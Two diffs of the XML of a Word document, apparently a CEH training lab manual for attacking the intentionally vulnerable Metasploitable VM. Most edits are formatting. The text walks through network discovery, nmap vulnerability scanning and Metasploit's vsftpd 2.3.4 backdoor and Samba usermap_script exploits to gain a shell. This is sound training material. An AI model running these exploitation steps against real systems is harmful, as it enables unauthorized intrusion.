--- a/material/Metasploitable_Complete_Lab_Manual.docx
+++ b/material/Metasploitable_Complete_Lab_Manual.docx
@@ -7,13 +7,8 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>Metasploitable – Complete Hands-on Lab Manual (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>CEH )</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Metasploitable – Complete Hands-on Lab Manual (CEH )</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -68,17 +63,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Installation of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>metasploitable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Installation of metasploitable</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -126,16 +112,35 @@
         <w:br/>
         <w:t>Commands:</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>To check ip address</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in parrot os/linux</w:t>
+      </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a</w:t>
+        <w:t>ip a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:t>fconfig</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>In windows</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ipconfig</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -143,53 +148,26 @@
         <w:rPr>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t xml:space="preserve">In parrot </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>os</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>In parrot os</w:t>
+      </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>arp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">-scan </w:t>
+        <w:t xml:space="preserve">arp-scan </w:t>
       </w:r>
       <w:r>
         <w:t>–</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>localnet</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>s</w:t>
       </w:r>
       <w:r>
-        <w:t>udo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>netdiscover</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>udo netdiscover</w:t>
+      </w:r>
       <w:r>
         <w:br/>
       </w:r>
@@ -207,6 +185,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Phase 2: Scanning &amp; Enumeration</w:t>
       </w:r>
     </w:p>
@@ -223,17 +202,35 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>Commands:</w:t>
+        <w:t>Commands</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in parrot os</w:t>
       </w:r>
       <w:r>
         <w:br/>
+      </w:r>
+      <w:r>
+        <w:t>nmap &lt;target-ip&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">nmap </w:t>
+      </w:r>
+      <w:r>
+        <w:t>10.150.18.49</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>nmap -sS -sV &lt;target-ip&gt;</w:t>
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>nmap -A &lt;target-ip&gt;</w:t>
       </w:r>
       <w:r>
@@ -250,23 +247,13 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vsftpd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 2.3.4</w:t>
+      <w:r>
+        <w:t>vsftpd 2.3.4</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vsftpd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 2.3.4 exploit</w:t>
+      <w:r>
+        <w:t>vsftpd 2.3.4 exploit</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (search in google)</w:t>
@@ -294,13 +281,8 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>searchsploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:t xml:space="preserve">searchsploit </w:t>
       </w:r>
       <w:r>
         <w:t>vsftpd_234_backdoor</w:t>
@@ -331,15 +313,7 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>nmap --script vuln &lt;target-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
+        <w:t>nmap --script vuln &lt;target-ip&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -364,11 +338,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -389,11 +358,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -418,6 +382,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
@@ -458,7 +423,7 @@
           <w:lang w:val="en-IN"/>
         </w:rPr>
         <w:pict w14:anchorId="7385CB37">
-          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -498,7 +463,6 @@
         <w:rPr>
           <w:lang w:val="en-IN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Depending on open services, Nmap may execute scripts like:</w:t>
       </w:r>
     </w:p>
@@ -529,19 +493,11 @@
           <w:lang w:val="en-IN"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-IN"/>
         </w:rPr>
-        <w:t>ssl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-IN"/>
-        </w:rPr>
-        <w:t>-* (TLS/SSL weaknesses)</w:t>
+        <w:t>ssl-* (TLS/SSL weaknesses)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -554,19 +510,11 @@
           <w:lang w:val="en-IN"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-IN"/>
         </w:rPr>
-        <w:t>smb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-IN"/>
-        </w:rPr>
-        <w:t>-vuln-* (SMB flaws)</w:t>
+        <w:t>smb-vuln-* (SMB flaws)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -642,34 +590,19 @@
         <w:br/>
         <w:t>msfconsole</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>use exploit/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>unix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/ftp/vsftpd_234_backdoor</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>options</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>set RHOSTS &lt;target-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
+        <w:t>set RHOSTS &lt;target-ip&gt;</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -719,6 +652,9 @@
       </w:r>
       <w:r>
         <w:br/>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>- Explore file system</w:t>
       </w:r>
       <w:r>
@@ -754,9 +690,6 @@
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Report should include:</w:t>
       </w:r>
       <w:r>
@@ -858,19 +791,11 @@
           <w:lang w:val="en-IN"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-IN"/>
         </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> apt-get update &amp;&amp; apt-get install telnet</w:t>
+        <w:t>sudo apt-get update &amp;&amp; apt-get install telnet</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -880,15 +805,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">it will show you the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>user</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> name and password to login</w:t>
+        <w:t>it will show you the user name and password to login</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -897,15 +814,7 @@
         <w:t>2.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Samba </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>smbd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 3.X – 4.X</w:t>
+        <w:t>Samba smbd 3.X – 4.X</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -921,13 +830,8 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>use exploit/multi/samba/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>usermap_script</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>use exploit/multi/samba/usermap_script</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2035,6 +1939,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/material/Metasploitable_Complete_Lab_Manual.docx
+++ b/material/Metasploitable_Complete_Lab_Manual.docx
@@ -7,8 +7,13 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>Metasploitable – Complete Hands-on Lab Manual (CEH )</w:t>
-      </w:r>
+        <w:t>Metasploitable – Complete Hands-on Lab Manual (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CEH )</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -63,8 +68,17 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Installation of metasploitable</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Installation of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -115,23 +129,53 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>To check ip address</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> in parrot os/linux</w:t>
-      </w:r>
+        <w:t xml:space="preserve">To check </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> address</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in parrot </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>os</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>linux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:br/>
-        <w:t>ip a</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>i</w:t>
       </w:r>
       <w:r>
         <w:t>fconfig</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -148,26 +192,53 @@
         <w:rPr>
           <w:highlight w:val="yellow"/>
         </w:rPr>
-        <w:t>In parrot os</w:t>
-      </w:r>
+        <w:t xml:space="preserve">In parrot </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>os</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">arp-scan </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>arp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">-scan </w:t>
       </w:r>
       <w:r>
         <w:t>–</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>localnet</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>s</w:t>
       </w:r>
       <w:r>
-        <w:t>udo netdiscover</w:t>
-      </w:r>
+        <w:t>udo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>netdiscover</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:br/>
       </w:r>
@@ -205,33 +276,92 @@
         <w:t>Commands</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> in parrot os</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> in parrot </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>os</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:br/>
       </w:r>
-      <w:r>
-        <w:t>nmap &lt;target-ip&gt;</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;target-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">nmap </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>10.150.18.49</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>nmap -sS -sV &lt;target-ip&gt;</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sV</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;target-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>nmap -A &lt;target-ip&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -A &lt;target-ip&gt;</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -247,13 +377,23 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:t>vsftpd 2.3.4</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vsftpd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2.3.4</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>vsftpd 2.3.4 exploit</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vsftpd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2.3.4 exploit</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (search in google)</w:t>
@@ -281,8 +421,13 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">searchsploit </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>searchsploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>vsftpd_234_backdoor</w:t>
@@ -313,7 +458,15 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>nmap --script vuln &lt;target-ip&gt;</w:t>
+        <w:t>nmap --script vuln &lt;target-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -493,11 +646,19 @@
           <w:lang w:val="en-IN"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-IN"/>
         </w:rPr>
-        <w:t>ssl-* (TLS/SSL weaknesses)</w:t>
+        <w:t>ssl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-IN"/>
+        </w:rPr>
+        <w:t>-* (TLS/SSL weaknesses)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -510,11 +671,19 @@
           <w:lang w:val="en-IN"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-IN"/>
         </w:rPr>
-        <w:t>smb-vuln-* (SMB flaws)</w:t>
+        <w:t>smb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-IN"/>
+        </w:rPr>
+        <w:t>-vuln-* (SMB flaws)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -588,12 +757,24 @@
       </w:r>
       <w:r>
         <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:t>msfconsole</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
+        <w:t>use exploit/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>unix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/ftp/vsftpd_234_backdoor</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -602,14 +783,21 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>set RHOSTS &lt;target-ip&gt;</w:t>
+        <w:t>set RHOSTS &lt;target-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>run</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> or exploit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>exploit</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -620,14 +808,35 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>Shell access to Metasploitable.</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Shell access to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ls</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pwd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Phase 5: Post-Exploitation (Conceptual)</w:t>
       </w:r>
     </w:p>
@@ -652,9 +861,6 @@
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>- Explore file system</w:t>
       </w:r>
       <w:r>
@@ -791,21 +997,38 @@
           <w:lang w:val="en-IN"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-IN"/>
         </w:rPr>
-        <w:t>sudo apt-get update &amp;&amp; apt-get install telnet</w:t>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> apt-get update &amp;&amp; apt-get install telnet</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>telnet 192.168.0.123</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>it will show you the user name and password to login</w:t>
+        <w:t xml:space="preserve">it will show you the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>user</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> name and password to login</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -814,7 +1037,15 @@
         <w:t>2.</w:t>
       </w:r>
       <w:r>
-        <w:t>Samba smbd 3.X – 4.X</w:t>
+        <w:t xml:space="preserve">Samba </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>smbd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 3.X – 4.X</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -830,8 +1061,13 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>use exploit/multi/samba/usermap_script</w:t>
-      </w:r>
+        <w:t>use exploit/multi/samba/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usermap_script</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
